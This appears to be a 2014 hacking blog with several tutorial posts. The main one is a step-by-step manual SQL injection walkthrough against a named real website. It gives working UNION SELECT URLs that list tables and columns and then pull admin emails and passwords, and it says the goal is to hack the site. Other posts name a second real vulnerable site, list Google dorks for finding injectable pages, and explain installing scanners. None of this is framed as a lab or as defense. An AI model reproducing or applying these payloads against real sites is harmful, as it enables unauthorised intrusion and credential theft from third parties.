Hello World

Friday, 27 June 2014

How we can Check all Data in Sqli Injection in few minutes

Welcome PrOleEtS Today i gonna show you how we can check all data in sqli site , we can check this all Tables , Columns , Database Name , Version User Host Etc Only in few minutes :D

Lest Stat

Requirements :-

=> Vulnerability Site: http://www.arts.cuhk.edu.hk/~lal/index.php?id=9
=> Sqli Codes

=> Now simple find web orders or Table Number like this

=> copy sqli code and replace 6 number

=> After past code click Execute , you can see this we got all Tables columns and Databases or version :D

I hope you like this Tutorial ;) Thanks for Visiting like and share :)

Thursday, 26 June 2014

How to find vulnerability using uniscan windows

Welcome PrOleEetS Tool kit here today i gonna show you how we can find vulnerability using uniscan lets Move on :P

Requirements :-

Perl Language
Uniscan

After downloading Software first install Perl Software On c drive

=> After installing Perl software copy uniscan folder and past C drive and change uniscan folder name uniscan6.2 to uniscan

=> Now open your Command prompt using short keys Windo+R and type cmd then hit enter

=> Type cd../ 2 time and hit enter

=> Type cd uniscan 2 times and hit enter

your Uniscaner is uploaded
its type to scan a website use follow commands
=> uniscan.pl -u http://example.com -bqdw hit enter and your scanning is start

= > wait some time you can got all websites error :D

How to hack website manual ( Full Guide )

Hello PrOleEtS once again T00L kiT here, today i gonna start Sqli Injection, today is First class so lets start

Requirements :-

Firefox Browser

Hackbar

Vulnerability Site

Ok i have already Vulnerability site like this

http://www.morephotosradio.com/transcript.php?interview_id=2021

Check this this website vulnerability yes or no, Put ' in the end of Url Like
Step 1
=> http://www.morephotosradio.com/transcript.php?interview_id=2021'

yes i got a sql error you can see this

Step 2

=> Find tables numbers using order by--+- query For example

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 1--+- (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 2--+- (No Error)

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 3--+- (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 4--+- (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 5--+- (No Error)

and so on when we got Error this mean its table number like

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 45--+- (No Error)

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 47--+- ( Error)

its mean its have 46 table numbers

Step 3
=> Go to union based => Union statement and Select INT,INT

Step 4

=> Now enter table number value and click ok

Step 5

=> after click ok you see this suto type 1 to 46 numbers then click Execute for checking its working

Its working we can't got any error :D

step 6

=> Put - in the end link values like this

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--+-

you can see this when we put - we go got Columns number is 6

Step 7

=> Now we need version :-

replace 6 number this query "version()"

you can see this we got sqli Version if you want more information like user name hostname and database use this query :-

For Version = version()

For Database = database()

For use = use()

For Host = host@@

Step 8

=> now we need table information so replace 6 number follow query "group_concat(table_name)" without quotes and in the end or url use this query "from information_Schema.tables wehre table schema=database()--+-" without quotes like

For Tables

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(tables_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.tables where table_schema=database()--+-

you can see this we got all table names , we need admin user name because we wanna hack website :D

Step 9

=> now replace "database()" with User

Now select user and go to "sqli basics" and select "char()" then past "user" then click ok like

And replace table with columns like this

For columns

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.columns where table_name=CHAR(117, 115, 101, 114)--+-

now click Execute

Step 10

Now we need admin Email id and password now use this query

replace column_name with which data we need and ,0x3a, mean when we need more data or in the end of url type table name

For data

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(email,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from User--+-

You can see this we got all admin emails and passwords ;) :D

i hope you like this Tutorial

Thanks for visiting

Wednesday, 25 June 2014

How to Install Latest hack bar

Hello ProLeEts TooL kiT here now Sqli Injection tutorials start INSHALLAH i will share you my all knowledge about sqli and others

For manual injection we need a Hack bar so today i gonna teach you how to install latest hack bar on your own browser Firefox So Lets Start

Requirements :-
=> Latest Version a Hack Bar
=> Firefox Browser

After downloading Firefox Simply installed and open Firefox browser and go to Open menu and click
add-on

Now go to "get Add-On Menu" and click Tools for all add-on button

click Install Add-on from file

Open hack bar then click install button

after completing installation click restart now

Now you latest hack bar installed

Thanks for visiting :-

Like :- WwW.FaceBoOk.cOm/PrOleEtS

How to install w3af Scanner on Windows

Hello Friends , T00L kiT Here Today i will gonna show you how we can install "W3aF Scanner " on windows So Lets Start

Follow me ;)

Requirements :-

w3af_1.0-rc2_setup.exe
Python25

First go to this link Address Here and click and download w3af Software . after downloading w3af go to Python25 and download python25 and installed it.

Note:- Before installing w3af we need python25 .

After downloading click on setup and click next

The installer checks, that we have got the python's 2.5 version. We must install it, before we start the

installation, because we can't install w3af. Click the

Next button.

We can read the GNU GPL license. If you agree with it, Click theI Agree button, if not, click the Cancel button and the installation will break. So click the I Agree button

We can choose the installation type: Full, Costum, Minimal. Choose the Full, then click the Next button.

We can give the directory of w3af where we want to install, then click the Next button.

We can give Start Menu folder, where we want to create the program's shortcuts. Click the Next button

The installation is begin. Through the installation, we can install the dependencies.

Here we can see the installation of the pygtk-2.12.1. We have to do just click the Next and Finish button. Click the Next button.

Click the Next button.

The pygtk-2.12.1 is installing

The installation is done. Click the Finish button. That's what we have to do when we install the other

Finally you w3af scanner in ready :D

Thanks for Visiting

Google Dorks 20K +

TooL kiT here.

Today i will share 20k+ Google Dorks For Finding SQL vuln sites :D
--------------------------------------------------
--------------------------------------------------------------
index.php?id=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
news-full.php?id=
news_display.php?getid=

For More click here to
Download

how we can find vulnerability site using google dorks

T00L kiT here today i gonna teach you how we can find vulnerability site using google dorks and Sql Poizon The Exploit Scanner so lets start

Requirements

Google Dorks and Sql Poizon v1.1

=> Open Sql Poizon v1.1 - The Exploit Scanner